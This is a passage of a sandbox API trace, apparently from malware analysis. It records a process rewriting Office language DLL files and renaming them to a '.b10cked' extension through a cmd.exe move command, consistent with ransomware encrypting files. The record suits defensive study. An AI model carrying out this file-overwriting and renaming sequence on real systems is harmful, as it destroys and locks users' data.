CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.073] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.073] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0169.073] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.073] ReleaseMutex (hMutex=0xf8) returned 1 [0169.073] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) 
returned 0x0 [0169.074] ReleaseMutex (hMutex=0xf8) returned 1 [0169.074] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.074] ReleaseMutex (hMutex=0xf8) returned 1 [0169.074] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.074] ReleaseMutex (hMutex=0xf8) returned 1 [0169.074] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0169.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.175] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22596449508) returned 1 [0169.175] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x2d60 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.176] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.177] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x2d60 [0169.178] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.178] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, 
lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x2878 [0169.178] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0169.347] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x2d60 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x2d60 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.348] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.348] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x16af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: 
lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x16af, lpOverlapped=0x0) returned 1 [0169.351] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.351] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x16af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x16af, lpOverlapped=0x0) returned 1 [0169.351] SetFilePointer (in: hFile=0x114, lDistanceToMove=-5807, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x16b1 [0169.352] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x16af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x16af, lpOverlapped=0x0) returned 1 [0169.352] SetFilePointer (in: hFile=0x114, lDistanceToMove=-5807, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x16b1 [0169.352] WriteFile (in: hFile=0x114, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x16af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x16af, lpOverlapped=0x0) returned 1 [0169.358] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0169.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLWVW.DLL.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLWVW.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0169.359] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ece0*=0) returned 0x2d60 [0169.359] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0169.359] CloseHandle (hObject=0x114) returned 1 [0169.360] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX") returned 0x3c [0169.362] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0169.362] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWV~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OUTLWVW.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x848, dwThreadId=0x9e0)) returned 1 [0169.384] CloseHandle (hObject=0x1b4) returned 1 [0169.384] CloseHandle 
(hObject=0x114) returned 1 [0169.384] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.384] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.384] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0169.384] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.385] ReleaseMutex (hMutex=0xf8) returned 1 [0169.385] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.385] ReleaseMutex (hMutex=0xf8) returned 1 [0169.385] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.385] ReleaseMutex (hMutex=0xf8) returned 1 [0169.385] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.385] ReleaseMutex (hMutex=0xf8) returned 1 [0169.385] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.386] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22617520943) returned 1 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.386] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xd160 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.387] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.388] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd160 [0169.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.389] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xcc78 [0169.389] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xd160 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xd160 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.410] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.411] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x68af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x68af, lpOverlapped=0x0) returned 1 [0169.468] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.468] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x68af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x68af, lpOverlapped=0x0) returned 1 [0169.468] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26799, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x68b1 [0169.468] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x68af, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x68af, lpOverlapped=0x0) returned 1 [0169.469] SetFilePointer (in: hFile=0x114, lDistanceToMove=-26799, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x68b1 [0169.470] WriteFile (in: 
hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x68af, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x68af, lpOverlapped=0x0) returned 1 [0169.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0169.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.DLL.trx_dll", cchWideChar=18, lpMultiByteStr=0x1328744, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPINTL.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 18 [0169.476] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xd160 